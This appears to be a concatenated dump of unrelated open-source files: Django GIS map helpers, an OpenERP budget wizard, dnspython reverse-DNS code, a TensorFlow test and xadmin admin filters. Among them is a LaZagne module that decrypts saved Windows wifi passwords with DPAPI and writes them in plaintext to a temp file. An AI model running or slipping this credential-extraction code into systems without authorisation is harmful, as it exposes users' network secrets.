        return format_html('onload="{}.{}_load()"', self.js_module, self.dom_id)

    @property
    def api_script(self):
        "Returns the <script> tag for the Google Maps API javascript."
        return format_html('<script src="{}{}" type="text/javascript"></script>',
                           self.api_url, self.key)

    @property
    def js(self):
        "Returns only the generated Google Maps JavaScript (no <script> tags)."
        return self.render()

    @property
    def scripts(self):
        "Returns all <script></script> tags required with Google Maps JavaScript."
        return format_html('{}\n    <script type="text/javascript">\n//<![CDATA[\n{}//]]>\n    </script>',
                           self.api_script, mark_safe(self.js))

    @property
    def style(self):
        "Returns additional CSS styling needed for Google Maps on IE."
        return format_html('<style type="text/css">{}</style>', self.vml_css)

    @property
    def xhtml(self):
        "Returns XHTML information needed for IE VML overlays."
        return format_html('<html xmlns="http://www.w3.org/1999/xhtml" {}>', self.xmlns)

    @property
    def icons(self):
        "Returns a sequence of GIcon objects in this map."
        return set(marker.icon for marker in self.markers if marker.icon)
class GoogleMapSet(GoogleMap):

    def __init__(self, *args, **kwargs):
        """
        A class for generating sets of Google Maps that will be shown on the
        same page together.

        Example:

        gmapset = GoogleMapSet( GoogleMap( ... ), GoogleMap( ... ) )
        gmapset = GoogleMapSet( [ gmap1, gmap2] )
        """
        # The `google-multi.js` template is used instead of `google-single.js`
        # by default.
        template = kwargs.pop('template', 'gis/google/google-multi.js')

        # This is the template used to generate the GMap load JavaScript for
        # each map in the set.
        self.map_template = kwargs.pop('map_template', 'gis/google/google-single.js')

        # Running GoogleMap.__init__(), and resetting the template
        # value with default obtained above.
        # NOTE(review): positional *args are not forwarded to the parent —
        # they are consumed below as the map list; only **kwargs reach
        # GoogleMap.__init__.
        super(GoogleMapSet, self).__init__(**kwargs)
        self.template = template

        # If a tuple/list passed in as first element of args, then assume
        # it is the full list of maps; otherwise the maps were passed as
        # individual positional arguments.
        if isinstance(args[0], (tuple, list)):
            self.maps = args[0]
        else:
            self.maps = args

        # Generating DOM ids for each of the maps in the set.
        self.dom_ids = ['map%d' % i for i in range(len(self.maps))]

    def load_map_js(self):
        """
        Returns JavaScript containing all of the loading routines for each
        map in this set.
        """
        result = []
        for dom_id, gmap in zip(self.dom_ids, self.maps):
            # Backup copies the GoogleMap DOM id and template attributes.
            # They are overridden on each GoogleMap instance in the set so
            # that only the loading JavaScript (and not the header variables)
            # is used with the generated DOM ids.
            tmp = (gmap.template, gmap.dom_id)
            gmap.template = self.map_template
            gmap.dom_id = dom_id
            result.append(gmap.js)
            # Restoring the backup values.
            gmap.template, gmap.dom_id = tmp
        return mark_safe(''.join(result))

    def render(self):
        """
        Generates the JavaScript for the collection of Google Maps in
        this set.
        """
        params = {'js_module': self.js_module,
                  'dom_ids': self.dom_ids,
                  'load_map_js': self.load_map_js(),
                  'icons': self.icons,
                  }
        params.update(self.extra_context)
        return render_to_string(self.template, params)

    @property
    def onload(self):
        "Returns the `onload` HTML <body> attribute."
        # Overloaded to use the `load` function defined in the
        # `google-multi.js`, which calls the load routines for
        # each one of the individual maps in the set.
        return mark_safe('onload="%s.load()"' % self.js_module)

    @property
    def icons(self):
        "Returns a sequence of all icons in each map of the set."
        icons = set()
        for map in self.maps:
            icons |= map.icons
        return icons
| bsd-3-clause |
Antiun/c2c-rd-addons | c2c_budget_chricar/wizard/compare_versions.py | 4 | 5558 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) Camptocamp SA - http://www.camptocamp.com
# Author: Arnaud WÃŒst
#
# This file is part of the c2c_budget module
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
import wizard
#import pooler
class wiz_compare_versions(wizard.interface):
    """ display options to print the report that compare two versions """

    def _init_fields(self, cr, uid, data, context):
        """ init the form's fields """
        # NOTE(review): 'pooler' is used throughout this wizard but its
        # import appears commented out at module top — verify it is
        # available at runtime (e.g. via the OpenERP framework).
        budget_obj = pooler.get_pool(cr.dbname).get('c2c_budget')
        res = {}
        # we come from budget
        if data['model'] == 'c2c_budget':
            budget_obj = pooler.get_pool(cr.dbname).get('c2c_budget')
            # init version and version 2 with the 2 first versions
            if len(data['ids']) >= 1:
                budget = budget_obj.browse(cr, uid, data['ids'][0])
                if len(budget.budget_version_ids) >= 1:
                    res['version_1'] = budget.budget_version_ids[0].id
                    res['currency'] = budget.budget_version_ids[0].currency_id.id
                if len(budget.budget_version_ids) >= 2:
                    res['version_2'] = budget.budget_version_ids[1].id
        # we come from versions
        elif data['model'] == 'c2c_budget.version':
            version_obj = pooler.get_pool(cr.dbname).get('c2c_budget.version')
            # init version and version 2 with the 2 first versions
            if len(data['ids']) >= 1:
                res['version_1'] = data['ids'][0]
                res['currency'] = version_obj.browse(cr, uid, data['ids'][0], context=context).currency_id.id
            if len(data['ids']) >= 2:
                res['version_2'] = data['ids'][1]
        return res

    def _get_budget_lines(self, cr, uid, data, context):
        """ retrieve lines to work on """
        # check the two versions belong to the same budget; reject otherwise
        version_obj = pooler.get_pool(cr.dbname).get('c2c_budget.version')
        versions = version_obj.browse(cr, uid, [data['form']['version_1'], data['form']['version_2']], context=context)
        if versions[0].budget_id.id != versions[1].budget_id.id:
            raise wizard.except_wizard('Incompatible Versions', "The two selected versions do not belong to the same budget. Select two versions of the same budget to run the report")
        # find lines to work on, optionally restricted to selected periods
        line_obj = pooler.get_pool(cr.dbname).get('c2c_budget.line')
        period_obj = pooler.get_pool(cr.dbname).get('account.period')
        criteria = [('budget_version_id', 'in', [data['form']['version_1'], data['form']['version_2']])]
        if len(data['form']['periods'][0][2]) > 0:
            criteria.append(('period_id', 'in', data['form']['periods'][0][2]))
        line_ids = line_obj.search(cr, uid, criteria, context=context)
        values = {'ids': line_ids
                  }
        return values

    # Wizard form layout (OpenERP XML view definition).
    _form = """<?xml version="1.0"?>
    <form string="Versions Comparing" width="800">
    <field name="version_1" />
    <field name="version_2" />
    <newline/>
    <field name="currency" />
    <newline/>
    <separator string="Select periods (empty for all)" colspan="4"/>
    <field name="periods" colspan="4" nolabel="1" height="200" />
    </form>"""

    # Field definitions backing the form above.
    _fields = {
        'version_1': {'string':'Version 1', 'type':'many2one', 'relation':'c2c_budget.version', 'required':True },
        'version_2': {'string':'Version 2', 'type':'many2one', 'relation':'c2c_budget.version', 'required':True },
        'currency': {'string':'Currency' , 'type':'many2one', 'relation':'res.currency', 'required':True },
        'periods': {'string':'Periods' , 'type':'many2many','relation':'account.period'},
    }

    # Wizard state machine: 'init' shows the form, 'print' runs the report.
    states = {
        'init' : {
            'actions':[_init_fields],
            'result' : {'type':'form', 'arch':_form, 'fields':_fields, 'state': [('end','Cancel'),('print','Print')]},
        },
        'print' : {
            'actions' : [_get_budget_lines],
            'result' : {'type':'print', 'report':'compare_versions', 'get_id_from_action':True, 'state':'end'},
        },
    }
wiz_compare_versions('compare.budget.versions') | agpl-3.0 |
edumatos/namebench | nb_third_party/dns/reversename.py | 248 | 2931 | # Copyright (C) 2006, 2007, 2009, 2010 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""DNS Reverse Map Names.
@var ipv4_reverse_domain: The DNS IPv4 reverse-map domain, in-addr.arpa.
@type ipv4_reverse_domain: dns.name.Name object
@var ipv6_reverse_domain: The DNS IPv6 reverse-map domain, ip6.arpa.
@type ipv6_reverse_domain: dns.name.Name object
"""
import dns.name
import dns.ipv6
import dns.ipv4
ipv4_reverse_domain = dns.name.from_text('in-addr.arpa.')
ipv6_reverse_domain = dns.name.from_text('ip6.arpa.')
def from_address(text):
    """Convert an IPv4 or IPv6 address in textual form into a Name object whose
    value is the reverse-map domain name of the address.

    @param text: an IPv4 or IPv6 address in textual form (e.g. '127.0.0.1',
    '::1')
    @type text: str
    @rtype: dns.name.Name object
    """
    try:
        # Try IPv6 first; each hex nibble becomes one reverse-map label.
        parts = list(dns.ipv6.inet_aton(text).encode('hex_codec'))
        origin = ipv6_reverse_domain
    except Exception:
        # Fix: was a bare 'except:', which also swallowed SystemExit and
        # KeyboardInterrupt. Not IPv6 — fall back to IPv4 (inet_aton will
        # raise its own error if the text is not a valid address at all).
        parts = ['%d' % ord(byte) for byte in dns.ipv4.inet_aton(text)]
        origin = ipv4_reverse_domain
    parts.reverse()
    return dns.name.from_text('.'.join(parts), origin=origin)
def to_address(name):
    """Convert a reverse map domain name into textual address form.

    @param name: an IPv4 or IPv6 address in reverse-map form.
    @type name: dns.name.Name object
    @rtype: str
    """
    if name.is_subdomain(ipv4_reverse_domain):
        # IPv4: labels are the dotted-quad octets in reverse order.
        name = name.relativize(ipv4_reverse_domain)
        labels = list(name.labels)
        labels.reverse()
        text = '.'.join(labels)
        # run through inet_aton() to check syntax and make pretty.
        return dns.ipv4.inet_ntoa(dns.ipv4.inet_aton(text))
    elif name.is_subdomain(ipv6_reverse_domain):
        # IPv6: labels are single hex nibbles in reverse order; regroup
        # them four at a time into the colon-separated hextets.
        name = name.relativize(ipv6_reverse_domain)
        labels = list(name.labels)
        labels.reverse()
        parts = []
        i = 0
        l = len(labels)
        while i < l:
            parts.append(''.join(labels[i:i+4]))
            i += 4
        text = ':'.join(parts)
        # run through inet_aton() to check syntax and make pretty.
        return dns.ipv6.inet_ntoa(dns.ipv6.inet_aton(text))
    else:
        raise dns.exception.SyntaxError('unknown reverse-map address family')
| apache-2.0 |
benoitsteiner/tensorflow | tensorflow/python/grappler/memory_optimizer_test.py | 12 | 3336 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the swig wrapper tf_optimizer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.grappler import tf_optimizer
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class MemoryOptimizerTest(test.TestCase):
  """Tests the Grappler memory optimizer."""

  def testNoSwapping(self):
    """Make sure the graph is preserved when there is nothing to swap."""
    a = constant_op.constant(10, name='a')
    b = constant_op.constant(20, name='b')
    c = math_ops.add_n([a, b], name='c')
    d = math_ops.add_n([b, c], name='d')
    train_op = ops.get_collection_ref(ops.GraphKeys.TRAIN_OP)
    train_op.append(d)
    mg = meta_graph.create_meta_graph_def(graph=ops.get_default_graph())
    rewriter_config = rewriter_config_pb2.RewriterConfig(
        memory_optimization=rewriter_config_pb2.RewriterConfig.MANUAL)
    graph = tf_optimizer.OptimizeGraph(rewriter_config, mg)

    # No node carries a swap annotation, so the optimizer must leave the
    # graph untouched: same four nodes, same names.
    self.assertEqual(len(graph.node), 4)
    self.assertItemsEqual([node.name
                           for node in graph.node], ['a', 'b', 'c', 'd'])

  def testSimpleSwap(self):
    """Check that the swap annotations are followed."""
    a = constant_op.constant(10, name='a')
    b = constant_op.constant(20, name='b')
    c = math_ops.add_n([a, b], name='c')
    d = math_ops.add_n([b, c], name='d')
    train_op = ops.get_collection_ref(ops.GraphKeys.TRAIN_OP)
    train_op.append(d)

    # Annotate d's first input (index 0) for host swapping.
    d.op.node_def.attr['_swap_to_host'].i = 0

    mg = meta_graph.create_meta_graph_def(graph=ops.get_default_graph())
    rewriter_config = rewriter_config_pb2.RewriterConfig(
        memory_optimization=rewriter_config_pb2.RewriterConfig.MANUAL)
    graph = tf_optimizer.OptimizeGraph(rewriter_config, mg)

    # The optimizer must insert a swap-out/swap-in node pair for d's input.
    self.assertEqual(len(graph.node), 6)
    self.assertItemsEqual([node.name for node in graph.node], [
        'a',
        'b',
        'c',
        'd',
        'swap_in_d_0',
        'swap_out_d_0',
    ])
    # Verify the rewiring: b -> swap_out -> swap_in -> d, with a control
    # dependency (^b) delaying the swap-in until b has executed.
    for node in graph.node:
      if node.name == 'swap_in_d_0':
        self.assertEqual('swap_out_d_0', node.input[0])
        self.assertEqual('^b', node.input[1])
      elif node.name == 'swap_out_d_0':
        self.assertEqual('b', node.input[0])
      elif node.name == 'd':
        self.assertEqual('swap_in_d_0', node.input[0])
        self.assertEqual('c', node.input[1])


if __name__ == '__main__':
  test.main()
| apache-2.0 |
rgfernandes/LaZagne | Windows/src/LaZagne/softwares/wifi/wifipass.py | 11 | 2712 | import xml.etree.cElementTree as ET
import os, win32crypt
import binascii
import tempfile, socket
from ctypes import *
from config.moduleInfo import ModuleInfo
import argparse
class WifiPass(ModuleInfo):
    """Recover saved Windows wifi (WLAN profile) passwords.

    Reads the per-interface WLAN profile XML files and decrypts the
    'keyMaterial' blob with the Windows DPAPI (CryptUnprotectData).
    Requires administrator privileges and Windows Vista or later.
    """

    def __init__(self):
        # Hidden launcher option (argparse.SUPPRESS keeps it out of --help);
        # presumably triggered internally by the main LaZagne driver.
        options = {'command': '--HiddenWifiArgs', 'action': 'store_true', 'dest': 'wifipass', 'help': argparse.SUPPRESS}
        ModuleInfo.__init__(self, 'wifipass', 'wifi', options)

    # used when launched with a system account
    def run(self):
        # need to be admin privilege, to find passwords
        if not windll.Shell32.IsUserAnAdmin():
            return
        else:
            directory = ''
            if 'ALLUSERSPROFILE' in os.environ:
                directory = os.environ['ALLUSERSPROFILE'] + os.sep + 'Microsoft\Wlansvc\Profiles\Interfaces'

            # for windows Vista or higher
            if os.path.exists(directory):
                passwordFound = False
                rep = []
                pwdFound = []
                # One sub-directory per network interface, each containing
                # one XML profile file per saved network.
                for repository in os.listdir(directory):
                    if os.path.isdir(directory + os.sep + repository):

                        rep = directory + os.sep + repository
                        for file in os.listdir(rep):
                            values = {}
                            if os.path.isfile(rep + os.sep + file):
                                f = rep + os.sep + file
                                tree = ET.ElementTree(file=f)
                                root = tree.getroot()
                                # Profile elements are namespaced; derive the
                                # namespace prefix from the root tag.
                                xmlns = root.tag.split("}")[0] + '}'

                                iterate = False
                                for elem in tree.iter():
                                    if elem.tag.endswith('SSID'):
                                        for w in elem:
                                            if w.tag == xmlns + 'name':
                                                values['SSID'] = w.text

                                    if elem.tag.endswith('authentication'):
                                        values['Authentication'] = elem.text

                                    if elem.tag.endswith('protected'):
                                        values['Protected'] = elem.text

                                    if elem.tag.endswith('keyMaterial'):
                                        key = elem.text
                                        try:
                                            # keyMaterial is a hex-encoded DPAPI
                                            # blob; decrypt as the SYSTEM/admin
                                            # context to obtain the plaintext key.
                                            binary_string = binascii.unhexlify(key)
                                            password = win32crypt.CryptUnprotectData(binary_string, None, None, None, 0)[1]
                                            values['Password'] = password
                                            passwordFound = True
                                        except:
                                            values['INFO'] = '[!] Password not found.'

                                # store credentials
                                if len(values) != 0:
                                    pwdFound.append(values)

                # If at least one password has been found, we create the file in temp directory
                # NOTE(review): results are handed off via a fixed-name temp
                # file (TEMP123A.txt) — presumably read back by the launcher;
                # verify against the calling code.
                if passwordFound:
                    try:
                        filepath = tempfile.gettempdir()
                        tmp = ''
                        cpt = 1
                        for pwd in pwdFound:
                            tmp += '[wifi%s]\r\n' % str(cpt)
                            cpt += 1
                            for p in pwd.keys():
                                tmp = str(tmp) + str(p) + '=' + str(pwd[p]) + '\r\n'
                            tmp = str(tmp) + '\r\n'
                        open(filepath + os.sep + 'TEMP123A.txt','w').write(tmp)
                    except:
                        pass
| lgpl-3.0 |
LiZoRN/Charlotte | extra_apps/xadmin/filters.py | 11 | 22134 | from __future__ import absolute_import
from django.db import models
from django.core.exceptions import ImproperlyConfigured
from django.utils.encoding import smart_text
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.template.loader import get_template
from django.template.context import Context
from django.utils import six
from django.utils.safestring import mark_safe
from django.utils.html import escape,format_html
from django.utils.text import Truncator
from django.core.cache import cache, caches
from xadmin.views.list import EMPTY_CHANGELIST_VALUE
from xadmin.util import is_related_field,is_related_field2
import datetime
FILTER_PREFIX = '_p_'
SEARCH_VAR = '_q_'
from .util import (get_model_from_relation,
reverse_field_path, get_limit_choices_to_from_path, prepare_lookup_value)
class BaseFilter(object):
    """Common behaviour shared by every changelist filter.

    Subclasses must set ``title`` and implement ``has_output`` and
    ``do_filte`` (sic -- the misspelled name is the project-wide API).
    """
    title = None
    template = 'xadmin/filters/list.html'

    @classmethod
    def test(cls, field, request, params, model, admin_view, field_path):
        """Hook deciding whether this filter class handles the given field."""
        pass

    def __init__(self, request, params, model, admin_view):
        self.used_params = {}
        self.request = request
        self.params = params
        self.model = model
        self.admin_view = admin_view
        if self.title is None:
            raise ImproperlyConfigured(
                "The filter '%s' does not specify "
                "a 'title'." % self.__class__.__name__)

    def query_string(self, new_params=None, remove=None):
        """Delegate query-string construction to the admin view."""
        return self.admin_view.get_query_string(new_params, remove)

    def form_params(self):
        """Hidden form parameters with this filter's own keys removed."""
        prefixed = [FILTER_PREFIX + key for key in self.used_params]
        return self.admin_view.get_form_params(remove=prefixed)

    def has_output(self):
        """
        Returns True if some choices would be output for this filter.
        """
        raise NotImplementedError

    @property
    def is_used(self):
        # A filter is "used" once at least one of its params appeared
        # in the request.
        return bool(self.used_params)

    def do_filte(self, queryset):
        """
        Returns the filtered queryset.
        """
        raise NotImplementedError

    def get_context(self):
        return {'title': self.title, 'spec': self, 'form_params': self.form_params()}

    def __str__(self):
        tpl = get_template(self.template)
        return mark_safe(tpl.render(context=self.get_context()))
class FieldFilterManager(object):
    """Registry of field-filter classes.

    Classes are tried in registration order; ``take_priority=True`` puts a
    class in front of the normal ones so it can override default handling.
    """
    _field_list_filters = []
    _take_priority_index = 0

    def register(self, list_filter_class, take_priority=False):
        if take_priority:
            # This is to allow overriding the default filters for certain types
            # of fields with some custom filters. The first found in the list
            # is used in priority.
            self._field_list_filters.insert(
                self._take_priority_index, list_filter_class)
            self._take_priority_index += 1
        else:
            self._field_list_filters.append(list_filter_class)
        return list_filter_class

    def create(self, field, request, params, model, admin_view, field_path):
        """Instantiate the first registered filter whose test() accepts the field."""
        for candidate in self._field_list_filters:
            if candidate.test(field, request, params, model, admin_view, field_path):
                return candidate(field, request, params,
                                 model, admin_view, field_path=field_path)
manager = FieldFilterManager()
class FieldFilter(BaseFilter):
    # Base class for filters bound to a single model field.  Subclasses
    # declare ``lookup_formats``: a mapping of short names ("exact",
    # "isnull", ...) to ORM lookup templates ("%s__exact", ...).
    lookup_formats = {}

    def __init__(self, field, request, params, model, admin_view, field_path):
        self.field = field
        self.field_path = field_path
        # Human-readable title; falls back to the raw path for fields
        # without a verbose_name.
        self.title = getattr(field, 'verbose_name', field_path)
        self.context_params = {}
        super(FieldFilter, self).__init__(request, params, model, admin_view)
        # For every declared lookup, record the prefixed parameter name and
        # (if present in the request) pop and remember its value.  NOTE: this
        # deliberately mutates the shared ``params`` dict so later filters do
        # not see parameters already consumed here.
        for name, format in self.lookup_formats.items():
            p = format % field_path
            self.context_params["%s_name" % name] = FILTER_PREFIX + p
            if p in params:
                value = prepare_lookup_value(p, params.pop(p))
                self.used_params[p] = value
                self.context_params["%s_val" % name] = value
            else:
                self.context_params["%s_val" % name] = ''
        # Mirror every context param as an attribute, e.g.
        # context_params['exact_val'] -> self.lookup_exact_val.  map() is
        # lazy on Python 3, hence the list() to force the side effects.
        arr = map(
            lambda kv: setattr(self, 'lookup_' + kv[0], kv[1]),
            self.context_params.items()
        )
        if six.PY3:
            list(arr)

    def get_context(self):
        context = super(FieldFilter, self).get_context()
        context.update(self.context_params)
        # URL that clears every parameter this filter contributed.
        obj = map(lambda k: FILTER_PREFIX + k, self.used_params.keys())
        if six.PY3:
            obj = list(obj)
        context['remove_url'] = self.query_string({}, obj)
        return context

    def has_output(self):
        return True

    def do_filte(self, queryset):
        # Apply all captured lookups directly; subclasses override for
        # lookups the ORM does not support natively.
        return queryset.filter(**self.used_params)
class ListFieldFilter(FieldFilter):
    """Field filter rendered as a list of selectable choice links."""
    template = 'xadmin/filters/list.html'

    def get_context(self):
        ctx = super(ListFieldFilter, self).get_context()
        # Subclasses provide choices() as a generator; materialise it for
        # the template.
        ctx['choices'] = list(self.choices())
        return ctx
@manager.register
class BooleanFieldListFilter(ListFieldFilter):
    """All / Yes / No filter for boolean fields, plus an "Unknown" choice
    for NullBooleanField."""
    lookup_formats = {'exact': '%s__exact', 'isnull': '%s__isnull'}

    @classmethod
    def test(cls, field, request, params, model, admin_view, field_path):
        return isinstance(field, (models.BooleanField, models.NullBooleanField))

    def choices(self):
        options = (('', _('All')), ('1', _('Yes')), ('0', _('No')))
        for lookup, label in options:
            # Selecting an exact value clears any isnull filtering.
            is_selected = (self.lookup_exact_val == lookup
                           and not self.lookup_isnull_val)
            yield {
                'selected': is_selected,
                'query_string': self.query_string(
                    {self.lookup_exact_name: lookup},
                    [self.lookup_isnull_name],
                ),
                'display': label,
            }
        # Nullable booleans get a third state.
        if isinstance(self.field, models.NullBooleanField):
            yield {
                'selected': self.lookup_isnull_val == 'True',
                'query_string': self.query_string(
                    {self.lookup_isnull_name: 'True'},
                    [self.lookup_exact_name],
                ),
                'display': _('Unknown'),
            }
@manager.register
class ChoicesFieldListFilter(ListFieldFilter):
    """Filter for any field that declares ``choices``."""
    lookup_formats = {'exact': '%s__exact'}

    @classmethod
    def test(cls, field, request, params, model, admin_view, field_path):
        return bool(field.choices)

    def choices(self):
        # BUG FIX: the original used ``self.lookup_exact_val is ''`` --
        # identity comparison against a string literal relies on CPython
        # interning and is not a guaranteed equality test.
        yield {
            'selected': self.lookup_exact_val == '',
            'query_string': self.query_string({}, [self.lookup_exact_name]),
            'display': _('All')
        }
        for lookup, title in self.field.flatchoices:
            yield {
                'selected': smart_text(lookup) == self.lookup_exact_val,
                'query_string': self.query_string({self.lookup_exact_name: lookup}),
                'display': title,
            }
@manager.register
class TextFieldListFilter(FieldFilter):
    """Free-text search filter for TextField and long CharField columns."""
    template = 'xadmin/filters/char.html'
    # 'search' maps to a __contains lookup; 'in' allows comma-split lists.
    lookup_formats = {'in': '%s__in', 'search': '%s__contains'}

    @classmethod
    def test(cls, field, request, params, model, admin_view, field_path):
        # Any TextField qualifies; CharFields only when long enough that a
        # choice list would be impractical.
        if isinstance(field, models.TextField):
            return True
        return isinstance(field, models.CharField) and field.max_length > 20
@manager.register
class NumberFieldListFilter(FieldFilter):
    """Comparison filter (=, <, >, <=, >=, !=) for numeric fields."""
    template = 'xadmin/filters/number.html'
    lookup_formats = {'equal': '%s__exact', 'lt': '%s__lt', 'gt': '%s__gt',
                      'ne': '%s__ne', 'lte': '%s__lte', 'gte': '%s__gte',
                      }

    @classmethod
    def test(cls, field, request, params, model, admin_view, field_path):
        return isinstance(field, (models.DecimalField, models.FloatField, models.IntegerField))

    def do_filte(self, queryset):
        # '__ne' is not a real ORM lookup, so translate it into an
        # exclude() and apply the remaining lookups normally.
        lookups = dict(self.used_params)
        not_equal_key = '%s__ne' % self.field_path
        if not_equal_key in lookups:
            queryset = queryset.exclude(
                **{self.field_path: lookups.pop(not_equal_key)})
        return queryset.filter(**lookups)
@manager.register
class DateFieldListFilter(ListFieldFilter):
    # Filter for date/datetime fields offering canned ranges (Today,
    # Past 7 days, This month/year) plus explicit since/until bounds.
    template = 'xadmin/filters/date.html'
    lookup_formats = {'since': '%s__gte', 'until': '%s__lt',
                      'year': '%s__year', 'month': '%s__month', 'day': '%s__day',
                      'isnull': '%s__isnull'}

    @classmethod
    def test(cls, field, request, params, model, admin_view, field_path):
        # DateTimeField subclasses DateField, so both are accepted.
        return isinstance(field, models.DateField)

    def __init__(self, field, request, params, model, admin_view, field_path):
        self.field_generic = '%s__' % field_path
        # Snapshot every request parameter targeting this field (with the
        # filter prefix re-applied) BEFORE the parent __init__ pops them;
        # used later to mark which canned link is selected.
        self.date_params = dict([(FILTER_PREFIX + k, v) for k, v in params.items()
                                 if k.startswith(self.field_generic)])
        super(DateFieldListFilter, self).__init__(
            field, request, params, model, admin_view, field_path)
        now = timezone.now()
        # When time zone support is enabled, convert "now" to the user's time
        # zone so Django's definition of "Today" matches what the user expects.
        if now.tzinfo is not None:
            current_tz = timezone.get_current_timezone()
            now = now.astimezone(current_tz)
            if hasattr(current_tz, 'normalize'):
                # available for pytz time zones
                now = current_tz.normalize(now)
        if isinstance(field, models.DateTimeField):
            today = now.replace(hour=0, minute=0, second=0, microsecond=0)
        else:  # field is a models.DateField
            today = now.date()
        tomorrow = today + datetime.timedelta(days=1)
        # (label, params) pairs rendered as quick links.  The lookup_*_name
        # attributes were set by FieldFilter.__init__ from lookup_formats.
        self.links = (
            (_('Any date'), {}),
            (_('Has date'), {
                self.lookup_isnull_name: False
            }),
            (_('Has no date'), {
                self.lookup_isnull_name: 'True'
            }),
            (_('Today'), {
                self.lookup_since_name: str(today),
                self.lookup_until_name: str(tomorrow),
            }),
            (_('Past 7 days'), {
                self.lookup_since_name: str(today - datetime.timedelta(days=7)),
                self.lookup_until_name: str(tomorrow),
            }),
            (_('This month'), {
                self.lookup_since_name: str(today.replace(day=1)),
                self.lookup_until_name: str(tomorrow),
            }),
            (_('This year'), {
                self.lookup_since_name: str(today.replace(month=1, day=1)),
                self.lookup_until_name: str(tomorrow),
            }),
        )

    def get_context(self):
        context = super(DateFieldListFilter, self).get_context()
        # True when the user filtered by an explicit year/month/day value
        # (rendered differently from the canned range links).
        context['choice_selected'] = bool(self.lookup_year_val) or bool(self.lookup_month_val) \
            or bool(self.lookup_day_val)
        return context

    def choices(self):
        for title, param_dict in self.links:
            yield {
                'selected': self.date_params == param_dict,
                'query_string': self.query_string(
                    param_dict, [FILTER_PREFIX + self.field_generic]),
                'display': title,
            }
@manager.register
class RelatedFieldSearchFilter(FieldFilter):
    # Ajax/select search widget for relation fields whose related
    # ModelAdmin declares relfield_style 'fk-ajax' or 'fk-select'.
    template = 'xadmin/filters/fk_search.html'

    @classmethod
    def test(cls, field, request, params, model, admin_view, field_path):
        if not is_related_field2(field):
            return False
        related_modeladmin = admin_view.admin_site._registry.get(
            get_model_from_relation(field))
        return related_modeladmin and getattr(related_modeladmin, 'relfield_style', None) in ('fk-ajax', 'fk-select')

    def __init__(self, field, request, params, model, model_admin, field_path):
        other_model = get_model_from_relation(field)
        # Older Django exposes the relation via ``field.rel``; otherwise
        # fall back to the related model's primary key name.
        if hasattr(field, 'rel'):
            rel_name = field.rel.get_related_field().name
        else:
            rel_name = other_model._meta.pk.name
        self.lookup_formats = {'in': '%%s__%s__in' % rel_name,'exact': '%%s__%s__exact' % rel_name}
        super(RelatedFieldSearchFilter, self).__init__(
            field, request, params, model, model_admin, field_path)
        related_modeladmin = self.admin_view.admin_site._registry.get(other_model)
        self.relfield_style = related_modeladmin.relfield_style
        if hasattr(field, 'verbose_name'):
            self.lookup_title = field.verbose_name
        else:
            self.lookup_title = other_model._meta.verbose_name
        self.title = self.lookup_title
        # URL of the related model's changelist, used by the ajax widget.
        self.search_url = model_admin.get_admin_url('%s_%s_changelist' % (
            other_model._meta.app_label, other_model._meta.model_name))
        self.label = self.label_for_value(other_model, rel_name, self.lookup_exact_val) if self.lookup_exact_val else ""
        # Extra query string propagating limit_choices_to restrictions to
        # the search view.
        # NOTE(review): ``field.rel`` is accessed unconditionally below even
        # though the code above guards with hasattr(field, 'rel') -- confirm
        # this branch is only reached on Django versions providing .rel.
        self.choices = '?'
        if field.rel.limit_choices_to:
            for i in list(field.rel.limit_choices_to):
                self.choices += "&_p_%s=%s" % (i, field.rel.limit_choices_to[i])
        self.choices = format_html(self.choices)

    def label_for_value(self, other_model, rel_name, value):
        # Human-readable label of the currently-selected related object;
        # empty string when the stored value no longer resolves.
        try:
            obj = other_model._default_manager.get(**{rel_name: value})
            return '%s' % escape(Truncator(obj).words(14, truncate='...'))
        except (ValueError, other_model.DoesNotExist):
            return ""

    def get_context(self):
        context = super(RelatedFieldSearchFilter, self).get_context()
        context['search_url'] = self.search_url
        context['label'] = self.label
        context['choices'] = self.choices
        context['relfield_style'] = self.relfield_style
        return context
@manager.register
class RelatedFieldListFilter(ListFieldFilter):
    """Choice-list filter for relation fields (FK / M2M / reverse)."""

    @classmethod
    def test(cls, field, request, params, model, admin_view, field_path):
        return is_related_field2(field)

    def __init__(self, field, request, params, model, model_admin, field_path):
        other_model = get_model_from_relation(field)
